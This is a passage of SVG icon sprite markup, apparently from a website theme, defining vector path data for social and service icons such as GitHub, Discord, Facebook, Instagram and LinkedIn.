c0.363,0.493,0.622,1.057,0.783,1.69c0.16,0.632,0.217,1.292,0.171,1.983h-6.428C15.557,14.84,15.795,15.506,16.162,15.864 M18.973,11.184c-0.291-0.321-0.783-0.496-1.384-0.496c-0.39,0-0.714,0.066-0.973,0.2c-0.254,0.132-0.461,0.297-0.621,0.491 c-0.157,0.197-0.265,0.405-0.328,0.628c-0.063,0.217-0.101,0.413-0.111,0.587h3.98C19.478,11.969,19.265,11.509,18.973,11.184z M15.057,7.738h4.985V6.524h-4.985L15.057,7.738z"/> </symbol> <symbol id="icon-chain" viewBox="0 0 24 24"> <path d="M19.647,16.706a1.134,1.134,0,0,0-.343-.833l-2.549-2.549a1.134,1.134,0,0,0-.833-.343,1.168,1.168,0,0,0-.883.392l.233.226q.2.189.264.264a2.922,2.922,0,0,1,.184.233.986.986,0,0,1,.159.312,1.242,1.242,0,0,1,.043.337,1.172,1.172,0,0,1-1.176,1.176,1.237,1.237,0,0,1-.337-.043,1,1,0,0,1-.312-.159,2.76,2.76,0,0,1-.233-.184q-.073-.068-.264-.264l-.226-.233a1.19,1.19,0,0,0-.4.895,1.134,1.134,0,0,0,.343.833L15.837,19.3a1.13,1.13,0,0,0,.833.331,1.18,1.18,0,0,0,.833-.318l1.8-1.789a1.12,1.12,0,0,0,.343-.821Zm-8.615-8.64a1.134,1.134,0,0,0-.343-.833L8.163,4.7a1.134,1.134,0,0,0-.833-.343,1.184,1.184,0,0,0-.833.331L4.7,6.473a1.12,1.12,0,0,0-.343.821,1.134,1.134,0,0,0,.343.833l2.549,2.549a1.13,1.13,0,0,0,.833.331,1.184,1.184,0,0,0,.883-.38L8.728,10.4q-.2-.189-.264-.264A2.922,2.922,0,0,1,8.28,9.9a.986.986,0,0,1-.159-.312,1.242,1.242,0,0,1-.043-.337A1.172,1.172,0,0,1,9.254,8.079a1.237,1.237,0,0,1,.337.043,1,1,0,0,1,.312.159,2.761,2.761,0,0,1,.233.184q.073.068.264.264l.226.233a1.19,1.19,0,0,0,.4-.895ZM22,16.706a3.343,3.343,0,0,1-1.042,2.488l-1.8,1.789a3.536,3.536,0,0,1-4.988-.025l-2.525-2.537a3.384,3.384,0,0,1-1.017-2.488,3.448,3.448,0,0,1,1.078-2.561l-1.078-1.078a3.434,3.434,0,0,1-2.549,1.078,3.4,3.4,0,0,1-2.5-1.029L3.029,9.794A3.4,3.4,0,0,1,2,7.294,3.343,3.343,0,0,1,3.042,4.806l1.8-1.789A3.384,3.384,0,0,1,7.331,2a3.357,3.357,0,0,1,2.5,1.042l2.525,2.537a3.384,3.384,0,0,1,1.017,2.488,3.448,3.448,0,0,1-1.078,2.561l1.078,1.078a3.551,3.551,0,0,1,5.049-.049l2.549,2.549A3.4,3.4,0,0,1,22,16.706Z"/> </symbol> <symbol id="icon-codepen" viewBox="0 0 24 24"> <path d="M22.016,8.84c-0.002-0.013-0.005-0.025-0.007-0.037c-0.005-0.025-0.008-0.048-0.015-0.072 c-0.003-0.015-0.01-0.028-0.013-0.042c-0.008-0.02-0.015-0.04-0.023-0.062c-0.007-0.015-0.013-0.028-0.02-0.042 c-0.008-0.02-0.018-0.037-0.03-0.057c-0.007-0.013-0.017-0.027-0.025-0.038c-0.012-0.018-0.023-0.035-0.035-0.052 c-0.01-0.013-0.02-0.025-0.03-0.037c-0.015-0.017-0.028-0.032-0.043-0.045c-0.01-0.012-0.022-0.023-0.035-0.035 c-0.015-0.015-0.032-0.028-0.048-0.04c-0.012-0.01-0.025-0.02-0.037-0.03c-0.005-0.003-0.01-0.008-0.015-0.012l-9.161-6.096 c-0.289-0.192-0.666-0.192-0.955,0L2.359,8.237C2.354,8.24,2.349,8.245,2.344,8.249L2.306,8.277 c-0.017,0.013-0.033,0.027-0.048,0.04C2.246,8.331,2.234,8.342,2.222,8.352c-0.015,0.015-0.028,0.03-0.042,0.047 c-0.012,0.013-0.022,0.023-0.03,0.037C2.139,8.453,2.125,8.471,2.115,8.488C2.107,8.501,2.099,8.514,2.09,8.526 C2.079,8.548,2.069,8.565,2.06,8.585C2.054,8.6,2.047,8.613,2.04,8.626C2.032,8.648,2.025,8.67,2.019,8.69 c-0.005,0.013-0.01,0.027-0.013,0.042C1.999,8.755,1.995,8.778,1.99,8.803C1.989,8.817,1.985,8.828,1.984,8.84 C1.978,8.879,1.975,8.915,1.975,8.954v6.093c0,0.037,0.003,0.075,0.008,0.112c0.002,0.012,0.005,0.025,0.007,0.038 c0.005,0.023,0.008,0.047,0.015,0.072c0.003,0.015,0.008,0.028,0.013,0.04c0.007,0.022,0.013,0.042,0.022,0.063 c0.007,0.015,0.013,0.028,0.02,0.04c0.008,0.02,0.018,0.038,0.03,0.058c0.007,0.013,0.015,0.027,0.025,0.038 c0.012,0.018,0.023,0.035,0.035,0.052c0.01,0.013,0.02,0.025,0.03,0.037c0.013,0.015,0.028,0.032,0.042,0.045 c0.012,0.012,0.023,0.023,0.035,0.035c0.015,0.013,0.032,0.028,0.048,0.04l0.038,0.03c0.005,0.003,0.01,0.007,0.013,0.01 l9.163,6.095C11.668,21.953,11.833,22,12,22c0.167,0,0.332-0.047,0.478-0.144l9.163-6.095l0.015-0.01 c0.013-0.01,0.027-0.02,0.037-0.03c0.018-0.013,0.035-0.028,0.048-0.04c0.013-0.012,0.025-0.023,0.035-0.035 c0.017-0.015,0.03-0.032,0.043-0.045c0.01-0.013,0.02-0.025,0.03-0.037c0.013-0.018,0.025-0.035,0.035-0.052 c0.008-0.013,0.018-0.027,0.025-0.038c0.012-0.02,0.022-0.038,0.03-0.058c0.007-0.013,0.013-0.027,0.02-0.04 c0.008-0.022,0.015-0.042,0.023-0.063c0.003-0.013,0.01-0.027,0.013-0.04c0.007-0.025,0.01-0.048,0.015-0.072 c0.002-0.013,0.005-0.027,0.007-0.037c0.003-0.042,0.007-0.079,0.007-0.117V8.954C22.025,8.915,22.022,8.879,22.016,8.84z M12.862,4.464l6.751,4.49l-3.016,2.013l-3.735-2.492V4.464z M11.138,4.464v4.009l-3.735,2.494L4.389,8.954L11.138,4.464z M3.699,10.562L5.853,12l-2.155,1.438V10.562z M11.138,19.536l-6.749-4.491l3.015-2.011l3.735,2.492V19.536z M12,14.035L8.953,12 L12,9.966L15.047,12L12,14.035z M12.862,19.536v-4.009l3.735-2.492l3.016,2.011L12.862,19.536z M20.303,13.438L18.147,12 l2.156-1.438L20.303,13.438z"/> </symbol> <symbol id="icon-deviantart" viewBox="0 0 24 24"> <path d="M 18.19 5.636 18.19 2 18.188 2 14.553 2 14.19 2.366 12.474 5.636 11.935 6 5.81 6 5.81 10.994 9.177 10.994 9.477 11.357 5.81 18.363 5.81 22 5.811 22 9.447 22 9.81 21.634 11.526 18.364 12.065 18 18.19 18 18.19 13.006 14.823 13.006 14.523 12.641 18.19 5.636z"/> </symbol> <symbol id="icon-digg" viewBox="0 0 24 24"> <path d="M4.5,5.4h2.2V16H1V8.5h3.5V5.4L4.5,5.4z M4.5,14.2v-4H3.2v4H4.5z M7.6,8.5V16h2.2V8.5C9.8,8.5,7.6,8.5,7.6,8.5z M7.6,5.4 v2.2h2.2V5.4C9.8,5.4,7.6,5.4,7.6,5.4z M10.7,8.5h5.7v10.1h-5.7v-1.8h3.5V16h-3.5C10.7,16,10.7,8.5,10.7,8.5z M14.2,14.2v-4h-1.3v4 H14.2z M17.3,8.5H23v10.1h-5.7v-1.8h3.5V16h-3.5C17.3,16,17.3,8.5,17.3,8.5z M20.8,14.2v-4h-1.3v4H20.8z"/> </symbol> <symbol id="icon-discord" viewBox="0 0 24 24"> <path d="M10.227 9.957c-.559 0-1 .48-1 1.063 0 .585.453 1.066 1 1.066.558 0 1-.48 1-1.066.007-.582-.442-1.063-1-1.063zm3.574 0c-.559 0-.996.48-.996 1.063 0 .585.449 1.066.996 1.066.558 0 1-.48 1-1.066 0-.582-.442-1.063-1-1.063zm0 0 M18.563 1.918H5.438c-1.11 0-2.008.879-2.008 1.973v12.957c0 1.093.898 1.972 2.007 1.972h11.11l-.52-1.773 1.254 1.14 1.184 1.075 2.105 1.82V3.891c0-1.094-.898-1.973-2.008-1.973zM14.78 14.434s-.351-.414-.644-.778c1.281-.355 1.773-1.14 1.773-1.14a5.745 5.745 0 0 1-1.129.566c-.488.2-.96.336-1.418.41a7.07 7.07 0 0 1-2.539-.008 8.133 8.133 0 0 1-1.441-.414 6.219 6.219 0 0 1-.715-.324c-.027-.02-.059-.027-.086-.047a.113.113 0 0 1-.039-.031c-.176-.094-.273-.16-.273-.16s.468.765 1.71 1.129c-.293.363-.656.797-.656.797-2.164-.067-2.984-1.457-2.984-1.457 0-3.086 1.41-5.586 1.41-5.586 1.41-1.036 2.75-1.008 2.75-1.008l.098.113c-1.762.5-2.575 1.258-2.575 1.258s.215-.117.579-.277c1.046-.454 1.878-.579 2.222-.606.059-.008.11-.02.168-.02a8.728 8.728 0 0 1 1.977-.019c.933.106 1.93.375 2.949.922 0 0-.773-.719-2.438-1.219l.137-.152s1.34-.028 2.75 1.008c0 0 1.414 2.5 1.414 5.586 0 0-.836 1.39-3 1.457zm0 0"/> </symbol> <symbol id="icon-dribbble" viewBox="0 0 24 24"> <path d="M12,22C6.486,22,2,17.514,2,12S6.486,2,12,2c5.514,0,10,4.486,10,10S17.514,22,12,22z M20.434,13.369 c-0.292-0.092-2.644-0.794-5.32-0.365c1.117,3.07,1.572,5.57,1.659,6.09C18.689,17.798,20.053,15.745,20.434,13.369z M15.336,19.876c-0.127-0.749-0.623-3.361-1.822-6.477c-0.019,0.006-0.038,0.013-0.056,0.019c-4.818,1.679-6.547,5.02-6.701,5.334 c1.448,1.129,3.268,1.803,5.243,1.803C13.183,20.555,14.311,20.313,15.336,19.876z M5.654,17.724 c0.193-0.331,2.538-4.213,6.943-5.637c0.111-0.036,0.224-0.07,0.337-0.102c-0.214-0.485-0.448-0.971-0.692-1.45 c-4.266,1.277-8.405,1.223-8.778,1.216c-0.003,0.087-0.004,0.174-0.004,0.261C3.458,14.207,4.29,16.21,5.654,17.724z M3.639,10.264 c0.382,0.005,3.901,0.02,7.897-1.041c-1.415-2.516-2.942-4.631-3.167-4.94C5.979,5.41,4.193,7.613,3.639,10.264z M9.998,3.709 c0.236,0.316,1.787,2.429,3.187,5c3.037-1.138,4.323-2.867,4.477-3.085C16.154,4.286,14.17,3.471,12,3.471 C11.311,3.471,10.641,3.554,9.998,3.709z M18.612,6.612C18.432,6.855,17,8.69,13.842,9.979c0.199,0.407,0.389,0.821,0.567,1.237 c0.063,0.148,0.124,0.295,0.184,0.441c2.842-0.357,5.666,0.215,5.948,0.275C20.522,9.916,19.801,8.065,18.612,6.612z"/> </symbol> <symbol id="icon-dropbox" viewBox="0 0 24 24"> <path d="M12,6.134L6.069,9.797L2,6.54l5.883-3.843L12,6.134z M2,13.054l5.883,3.843L12,13.459L6.069,9.797L2,13.054z M12,13.459 l4.116,3.439L22,13.054l-4.069-3.257L12,13.459z M22,6.54l-5.884-3.843L12,6.134l5.931,3.663L22,6.54z M12.011,14.2l-4.129,3.426 l-1.767-1.153v1.291l5.896,3.539l5.897-3.539v-1.291l-1.769,1.153L12.011,14.2z"/> </symbol> <symbol id="icon-etsy" viewBox="0 0 24 24"> <path d="M9.16033,4.038c0-.27174.02717-.43478.48913-.43478h6.22283c1.087,0,1.68478.92391,2.11957,2.663l.35326,1.38587h1.05978C19.59511,3.712,19.75815,2,19.75815,2s-2.663.29891-4.23913.29891h-7.962L3.29076,2.163v1.1413L4.731,3.57609c1.00543.19022,1.25.40761,1.33152,1.33152,0,0,.08152,2.71739.08152,7.20109s-.08152,7.17391-.08152,7.17391c0,.81522-.32609,1.11413-1.33152,1.30435l-1.44022.27174V22l4.2663-.13587h7.11957c1.60326,0,5.32609.13587,5.32609.13587.08152-.97826.625-5.40761.70652-5.89674H19.7038L18.644,18.52174c-.84239,1.90217-2.06522,2.038-3.42391,2.038H11.1712c-1.3587,0-2.01087-.54348-2.01087-1.712V12.65217s3.0163,0,3.99457.08152c.76087.05435,1.22283.27174,1.46739,1.33152l.32609,1.413h1.16848l-.08152-3.55978.163-3.587H15.02989l-.38043,1.57609c-.24457,1.03261-.40761,1.22283-1.46739,1.33152-1.38587.13587-4.02174.1087-4.02174.1087Z"/> </symbol> <symbol id="icon-facebook" viewBox="0 0 24 24"> <path d="M20.007,3H3.993C3.445,3,3,3.445,3,3.993v16.013C3,20.555,3.445,21,3.993,21h8.621v-6.971h-2.346v-2.717h2.346V9.31 c0-2.325,1.42-3.591,3.494-3.591c0.993,0,1.847,0.074,2.096,0.107v2.43l-1.438,0.001c-1.128,0-1.346,0.536-1.346,1.323v1.734h2.69 l-0.35,2.717h-2.34V21h4.587C20.555,21,21,20.555,21,20.007V3.993C21,3.445,20.555,3,20.007,3z"/> </symbol> <symbol id="icon-feed" viewBox="0 0 24 24"> <path d="M2,8.667V12c5.515,0,10,4.485,10,10h3.333C15.333,14.637,9.363,8.667,2,8.667z M2,2v3.333 c9.19,0,16.667,7.477,16.667,16.667H22C22,10.955,13.045,2,2,2z M4.5,17C3.118,17,2,18.12,2,19.5S3.118,22,4.5,22S7,20.88,7,19.5 S5.882,17,4.5,17z"/> </symbol> <symbol id="icon-flickr" viewBox="0 0 24 24"> <path d="M6.5,7c-2.75,0-5,2.25-5,5s2.25,5,5,5s5-2.25,5-5S9.25,7,6.5,7z M17.5,7c-2.75,0-5,2.25-5,5s2.25,5,5,5s5-2.25,5-5 S20.25,7,17.5,7z"/> </symbol> <symbol id="icon-foursquare" viewBox="0 0 24 24"> <path d="M17.573,2c0,0-9.197,0-10.668,0S5,3.107,5,3.805s0,16.948,0,16.948c0,0.785,0.422,1.077,0.66,1.172 c0.238,0.097,0.892,0.177,1.285-0.275c0,0,5.035-5.843,5.122-5.93c0.132-0.132,0.132-0.132,0.262-0.132h3.26 c1.368,0,1.588-0.977,1.732-1.552c0.078-0.318,0.692-3.428,1.225-6.122l0.675-3.368C19.56,2.893,19.14,2,17.573,2z M16.495,7.22 c-0.053,0.252-0.372,0.518-0.665,0.518c-0.293,0-4.157,0-4.157,0c-0.467,0-0.802,0.318-0.802,0.787v0.508 c0,0.467,0.337,0.798,0.805,0.798c0,0,3.197,0,3.528,0s0.655,0.362,0.583,0.715c-0.072,0.353-0.407,2.102-0.448,2.295 c-0.04,0.193-0.262,0.523-0.655,0.523c-0.33,0-2.88,0-2.88,0c-0.523,0-0.683,0.068-1.033,0.503 c-0.35,0.437-3.505,4.223-3.505,4.223c-0.032,0.035-0.063,0.027-0.063-0.015V4.852c0-0.298,0.26-0.648,0.648-0.648 c0,0,8.228,0,8.562,0c0.315,0,0.61,0.297,0.528,0.683L16.495,7.22z"/> </symbol> <symbol id="icon-goodreads" viewBox="0 0 24 24"> <path d="M17.3,17.5c-0.2,0.8-0.5,1.4-1,1.9c-0.4,0.5-1,0.9-1.7,1.2C13.9,20.9,13.1,21,12,21c-0.6,0-1.3-0.1-1.9-0.2 c-0.6-0.1-1.1-0.4-1.6-0.7c-0.5-0.3-0.9-0.7-1.2-1.2c-0.3-0.5-0.5-1.1-0.5-1.7h1.5c0.1,0.5,0.2,0.9,0.5,1.2 c0.2,0.3,0.5,0.6,0.9,0.8c0.3,0.2,0.7,0.3,1.1,0.4c0.4,0.1,0.8,0.1,1.2,0.1c1.4,0,2.5-0.4,3.1-1.2c0.6-0.8,1-2,1-3.5v-1.7h0 c-0.4,0.8-0.9,1.4-1.6,1.9c-0.7,0.5-1.5,0.7-2.4,0.7c-1,0-1.9-0.2-2.6-0.5C8.7,15,8.1,14.5,7.7,14c-0.5-0.6-0.8-1.3-1-2.1 c-0.2-0.8-0.3-1.6-0.3-2.5c0-0.9,0.1-1.7,0.4-2.5c0.3-0.8,0.6-1.5,1.1-2c0.5-0.6,1.1-1,1.8-1.4C10.3,3.2,11.1,3,12,3 c0.5,0,0.9,0.1,1.3,0.2c0.4,0.1,0.8,0.3,1.1,0.5c0.3,0.2,0.6,0.5,0.9,0.8c0.3,0.3,0.5,0.6,0.6,1h0V3.4h1.5V15 C17.6,15.9,17.5,16.7,17.3,17.5z M13.8,14.1c0.5-0.3,0.9-0.7,1.3-1.1c0.3-0.5,0.6-1,0.8-1.6c0.2-0.6,0.3-1.2,0.3-1.9 c0-0.6-0.1-1.2-0.2-1.9c-0.1-0.6-0.4-1.2-0.7-1.7c-0.3-0.5-0.7-0.9-1.3-1.2c-0.5-0.3-1.1-0.5-1.9-0.5s-1.4,0.2-1.9,0.5 c-0.5,0.3-1,0.7-1.3,1.2C8.5,6.4,8.3,7,8.1,7.6C8,8.2,7.9,8.9,7.9,9.5c0,0.6,0.1,1.3,0.2,1.9C8.3,12,8.6,12.5,8.9,13 c0.3,0.5,0.8,0.8,1.3,1.1c0.5,0.3,1.1,0.4,1.9,0.4C12.7,14.5,13.3,14.4,13.8,14.1z"/> </symbol> <symbol id="icon-google" viewBox="0 0 24 24"> <path d="M12.02,10.18v3.72v0.01h5.51c-0.26,1.57-1.67,4.22-5.5,4.22c-3.31,0-6.01-2.75-6.01-6.12s2.7-6.12,6.01-6.12 c1.87,0,3.13,0.8,3.85,1.48l2.84-2.76C16.99,2.99,14.73,2,12.03,2c-5.52,0-10,4.48-10,10s4.48,10,10,10c5.77,0,9.6-4.06,9.6-9.77 c0-0.83-0.11-1.42-0.25-2.05H12.02z"/> </symbol> <symbol id="icon-github" viewBox="0 0 24 24"> <path d="M12,2C6.477,2,2,6.477,2,12c0,4.419,2.865,8.166,6.839,9.489c0.5,0.09,0.682-0.218,0.682-0.484 c0-0.236-0.009-0.866-0.014-1.699c-2.782,0.602-3.369-1.34-3.369-1.34c-0.455-1.157-1.11-1.465-1.11-1.465 c-0.909-0.62,0.069-0.608,0.069-0.608c1.004,0.071,1.532,1.03,1.532,1.03c0.891,1.529,2.341,1.089,2.91,0.833 c0.091-0.647,0.349-1.086,0.635-1.337c-2.22-0.251-4.555-1.111-4.555-4.943c0-1.091,0.39-1.984,1.03-2.682 C6.546,8.54,6.202,7.524,6.746,6.148c0,0,0.84-0.269,2.75,1.025C10.295,6.95,11.15,6.84,12,6.836 c0.85,0.004,1.705,0.114,2.504,0.336c1.909-1.294,2.748-1.025,2.748-1.025c0.546,1.376,0.202,2.394,0.1,2.646 c0.64,0.699,1.026,1.591,1.026,2.682c0,3.841-2.337,4.687-4.565,4.935c0.359,0.307,0.679,0.917,0.679,1.852 c0,1.335-0.012,2.415-0.012,2.741c0,0.269,0.18,0.579,0.688,0.481C19.138,20.161,22,16.416,22,12C22,6.477,17.523,2,12,2z"/> </symbol> <symbol id="icon-instagram" viewBox="0 0 24 24"> <path d="M12,4.622c2.403,0,2.688,0.009,3.637,0.052c0.877,0.04,1.354,0.187,1.671,0.31c0.42,0.163,0.72,0.358,1.035,0.673 c0.315,0.315,0.51,0.615,0.673,1.035c0.123,0.317,0.27,0.794,0.31,1.671c0.043,0.949,0.052,1.234,0.052,3.637 s-0.009,2.688-0.052,3.637c-0.04,0.877-0.187,1.354-0.31,1.671c-0.163,0.42-0.358,0.72-0.673,1.035 c-0.315,0.315-0.615,0.51-1.035,0.673c-0.317,0.123-0.794,0.27-1.671,0.31c-0.949,0.043-1.233,0.052-3.637,0.052 s-2.688-0.009-3.637-0.052c-0.877-0.04-1.354-0.187-1.671-0.31c-0.42-0.163-0.72-0.358-1.035-0.673 c-0.315-0.315-0.51-0.615-0.673-1.035c-0.123-0.317-0.27-0.794-0.31-1.671C4.631,14.688,4.622,14.403,4.622,12 s0.009-2.688,0.052-3.637c0.04-0.877,0.187-1.354,0.31-1.671c0.163-0.42,0.358-0.72,0.673-1.035 c0.315-0.315,0.615-0.51,1.035-0.673c0.317-0.123,0.794-0.27,1.671-0.31C9.312,4.631,9.597,4.622,12,4.622 M12,3 C9.556,3,9.249,3.01,8.289,3.054C7.331,3.098,6.677,3.25,6.105,3.472C5.513,3.702,5.011,4.01,4.511,4.511 c-0.5,0.5-0.808,1.002-1.038,1.594C3.25,6.677,3.098,7.331,3.054,8.289C3.01,9.249,3,9.556,3,12c0,2.444,0.01,2.751,0.054,3.711 c0.044,0.958,0.196,1.612,0.418,2.185c0.23,0.592,0.538,1.094,1.038,1.594c0.5,0.5,1.002,0.808,1.594,1.038 c0.572,0.222,1.227,0.375,2.185,0.418C9.249,20.99,9.556,21,12,21s2.751-0.01,3.711-0.054c0.958-0.044,1.612-0.196,2.185-0.418 c0.592-0.23,1.094-0.538,1.594-1.038c0.5-0.5,0.808-1.002,1.038-1.594c0.222-0.572,0.375-1.227,0.418-2.185 C20.99,14.751,21,14.444,21,12s-0.01-2.751-0.054-3.711c-0.044-0.958-0.196-1.612-0.418-2.185c-0.23-0.592-0.538-1.094-1.038-1.594 c-0.5-0.5-1.002-0.808-1.594-1.038c-0.572-0.222-1.227-0.375-2.185-0.418C14.751,3.01,14.444,3,12,3L12,3z M12,7.378 c-2.552,0-4.622,2.069-4.622,4.622S9.448,16.622,12,16.622s4.622-2.069,4.622-4.622S14.552,7.378,12,7.378z M12,15 c-1.657,0-3-1.343-3-3s1.343-3,3-3s3,1.343,3,3S13.657,15,12,15z M16.804,6.116c-0.596,0-1.08,0.484-1.08,1.08 s0.484,1.08,1.08,1.08c0.596,0,1.08-0.484,1.08-1.08S17.401,6.116,16.804,6.116z"/> </symbol> <symbol id="icon-linkedin" viewBox="0 0 24 24"> <path d="M19.7,3H4.3C3.582,3,3,3.582,3,4.3v15.4C3,20.418,3.582,21,4.3,21h15.4c0.718,0,1.3-0.582,1.3-1.3V4.3 C21,3.582,20.418,3,19.7,3z M8.339,18.338H5.667v-8.59h2.672V18.338z M7.004,8.574c-0.857,0-1.549-0.694-1.549-1.548 c0-0.855,0.691-1.548,1.549-1.548c0.854,0,1.547,0.694,1.547,1.548C8.551,7.881,7.858,8.574,7.004,8.574z M18.339,18.338h-2.669 v-4.177c0-0.996-0.017-2.278-1.387-2.278c-1.389,0-1.601,1.086-1.601,2.206v4.249h-2.667v-8.59h2.559v1.174h0.037 c0.356-0.675,1.227-1.387,2.526-1.387c2.703,0,3.203,1.779,3.203,4.092V18.338z"/> </symbol> <symbol id="icon-mail" viewBox="0 0 24 24"> <path d="M20,4H4C2.895,4,2,4.895,2,6v12c0,1.105,0.895,2,2,2h16c1.105,0,2-0.895,2-2V6C22,4.895,21.105,4,20,4z M20,8.236l-8,4.882 L4,8.236V6h16V8.236z"/> </symbol> <symbol id="icon-meetup" viewBox="0 0 24 24"> <path d="M19.24775,14.722a3.57032,3.57032,0,0,1-2.94457,3.52073,3.61886,3.61886,0,0,1-.64652.05634c-.07314-.0008-.10187.02846-.12507.09547A2.38881,2.38881,0,0,1,13.49453,20.094a2.33092,2.33092,0,0,1-1.827-.50716.13635.13635,0,0,0-.19878-.00408,3.191,3.191,0,0,1-2.104.60248,3.26309,3.26309,0,0,1-3.00324-2.71993,2.19076,2.19076,0,0,1-.03512-.30865c-.00156-.08579-.03413-.1189-.11608-.13493a2.86421,2.86421,0,0,1-1.23189-.56111,2.945,2.945,0,0,1-1.166-2.05749,2.97484,2.97484,0,0,1,.87524-2.50774.112.112,0,0,0,.02091-.16107,2.7213,2.7213,0,0,1-.36648-1.48A2.81256,2.81256,0,0,1,6.57673,7.58838a.35764.35764,0,0,0,.28869-.22819,4.2208,4.2208,0,0,1,6.02892-1.90111.25161.25161,0,0,0,.22023.0243,3.65608,3.65608,0,0,1,3.76031.90678A3.57244,3.57244,0,0,1,17.95918,8.626a2.97339,2.97339,0,0,1,.01829.57356.10637.10637,0,0,0,.0853.12792,1.97669,1.97669,0,0,1,1.27939,1.33733,2.00266,2.00266,0,0,1-.57112,2.12652c-.05284.05166-.04168.08328-.01173.13489A3.51189,3.51189,0,0,1,19.24775,14.722Zm-6.35959-.27836a1.6984,1.6984,0,0,0,1.14556,1.61113,3.82039,3.82039,0,0,0,1.036.17935,1.46888,1.46888,0,0,0,.73509-.12255.44082.44082,0,0,0,.26057-.44274.45312.45312,0,0,0-.29211-.43375.97191.97191,0,0,0-.20678-.063c-.21326-.03806-.42754-.0701-.63973-.11215a.54787.54787,0,0,1-.50172-.60926,2.75864,2.75864,0,0,1,.1773-.901c.1763-.535.414-1.045.64183-1.55913A12.686,12.686,0,0,0,15.85,10.47863a1.58461,1.58461,0,0,0,.04861-.87208,1.04531,1.04531,0,0,0-.85432-.83981,1.60658,1.60658,0,0,0-1.23654.16594.27593.27593,0,0,1-.36286-.03413c-.085-.0747-.16594-.15379-.24918-.23055a.98682.98682,0,0,0-1.33577-.04933,6.1468,6.1468,0,0,1-.4989.41615.47762.47762,0,0,1-.51535.03566c-.17448-.09307-.35512-.175-.53531-.25665a1.74949,1.74949,0,0,0-.56476-.2016,1.69943,1.69943,0,0,0-1.61654.91787,8.05815,8.05815,0,0,0-.32952.80126c-.45471,1.2557-.82507,2.53825-1.20838,3.81639a1.24151,1.24151,0,0,0,.51532,1.44389,1.42659,1.42659,0,0,0,1.22008.17166,1.09728,1.09728,0,0,0,.66994-.69764c.44145-1.04111.839-2.09989,1.25981-3.14926.11581-.28876.22792-.57874.35078-.86438a.44548.44548,0,0,1,.69189-.19539.50521.50521,0,0,1,.15044.43836,1.75625,1.75625,0,0,1-.14731.50453c-.27379.69219-.55265,1.38236-.82766,2.074a2.0836,2.0836,0,0,0-.14038.42876.50719.50719,0,0,0,.27082.57722.87236.87236,0,0,0,.66145.02739.99137.99137,0,0,0,.53406-.532q.61571-1.20914,1.228-2.42031.28423-.55863.57585-1.1133a.87189.87189,0,0,1,.29055-.35253.34987.34987,0,0,1,.37634-.01265.30291.30291,0,0,1,.12434.31459.56716.56716,0,0,1-.04655.1915c-.05318.12739-.10286.25669-.16183.38156-.34118.71775-.68754,1.43273-1.02568,2.152A2.00213,2.00213,0,0,0,12.88816,14.44366Zm4.78568,5.28972a.88573.88573,0,0,0-1.77139.00465.8857.8857,0,0,0,1.77139-.00465Zm-14.83838-7.296a.84329.84329,0,1,0,.00827-1.68655.8433.8433,0,0,0-.00827,1.68655Zm10.366-9.43673a.83506.83506,0,1,0-.0091,1.67.83505.83505,0,0,0,.0091-1.67Zm6.85014,5.22a.71651.71651,0,0,0-1.433.0093.71656.71656,0,0,0,1.433-.0093ZM5.37528,6.17908A.63823.63823,0,1,0,6.015,5.54483.62292.62292,0,0,0,5.37528,6.17908Zm6.68214,14.80843a.54949.54949,0,1,0-.55052.541A.54556.54556,0,0,0,12.05742,20.98752Zm8.53235-8.49689a.54777.54777,0,0,0-.54027.54023.53327.53327,0,0,0,.532.52293.51548.51548,0,0,0,.53272-.5237A.53187.53187,0,0,0,20.58977,12.49063ZM7.82846,2.4715a.44927.44927,0,1,0,.44484.44766A.43821.43821,0,0,0,7.82846,2.4715Zm13.775,7.60492a.41186.41186,0,0,0-.40065.39623.40178.40178,0,0,0,.40168.40168A.38994.38994,0,0,0,22,10.48172.39946.39946,0,0,0,21.60349,10.07642ZM5.79193,17.96207a.40469.40469,0,0,0-.397-.39646.399.399,0,0,0-.396.405.39234.39234,0,0,0,.39939.389A.39857.39857,0,0,0,5.79193,17.96207Z"/> </symbol> <symbol id="icon-medium" viewBox="0 0 24 24"> <path d="M20.962,7.257l-5.457,8.867l-3.923-6.375l3.126-5.08c0.112-0.182,0.319-0.286,0.527-0.286c0.05,0,0.1,0.008,0.149,0.02 c0.039,0.01,0.078,0.023,0.114,0.041l5.43,2.715l0.006,0.003c0.004,0.002,0.007,0.006,0.011,0.008 C20.971,7.191,20.98,7.227,20.962,7.257z M9.86,8.592v5.783l5.14,2.57L9.86,8.592z M15.772,17.331l4.231,2.115 C20.554,19.721,21,19.529,21,19.016V8.835L15.772,17.331z M8.968,7.178L3.665,4.527C3.569,4.479,3.478,4.456,3.395,4.456 C3.163,4.456,3,4.636,3,4.938v11.45c0,0.306,0.224,0.669,0.498,0.806l4.671,2.335c0.12,0.06,0.234,0.088,0.337,0.088 c0.29,0,0.494-0.225,0.494-0.602V7.231C9,7.208,8.988,7.188,8.968,7.178z"/> </symbol> <symbol id="icon-pinterest" viewBox="0 0 24 24"> <path d="M12.289,2C6.617,2,3.606,5.648,3.606,9.622c0,1.846,1.025,4.146,2.666,4.878c0.25,0.111,0.381,0.063,0.439-0.169 c0.044-0.175,0.267-1.029,0.365-1.428c0.032-0.128,0.017-0.237-0.091-0.362C6.445,11.911,6.01,10.75,6.01,9.668 c0-2.777,2.194-5.464,5.933-5.464c3.23,0,5.49,2.108,5.49,5.122c0,3.407-1.794,5.768-4.13,5.768c-1.291,0-2.257-1.021-1.948-2.277 c0.372-1.495,1.089-3.112,1.089-4.191c0-0.967-0.542-1.775-1.663-1.775c-1.319,0-2.379,1.309-2.379,3.059 c0,1.115,0.394,1.869,0.394,1.869s-1.302,5.279-1.54,6.261c-0.405,1.666,0.053,4.368,0.094,4.604 c0.021,0.126,0.167,0.169,0.25,0.063c0.129-0.165,1.699-2.419,2.142-4.051c0.158-0.59,0.817-2.995,0.817-2.995 c0.43,0.784,1.681,1.446,3.013,1.446c3.963,0,6.822-3.494,6.822-7.833C20.394,5.112,16.849,2,12.289,2"/> </symbol> <symbol id="icon-pocket" viewBox="0 0 24 24"> <path d="M21.927,4.194C21.667,3.48,20.982,3,20.222,3h-0.01h-1.721H3.839C3.092,3,2.411,3.47,2.145,4.17 C2.066,4.378,2.026,4.594,2.026,4.814v6.035l0.069,1.2c0.29,2.73,1.707,5.115,3.899,6.778c0.039,0.03,0.079,0.059,0.119,0.089 l0.025,0.018c1.175,0.859,2.491,1.441,3.91,1.727c0.655,0.132,1.325,0.2,1.991,0.2c0.615,0,1.232-0.057,1.839-0.17 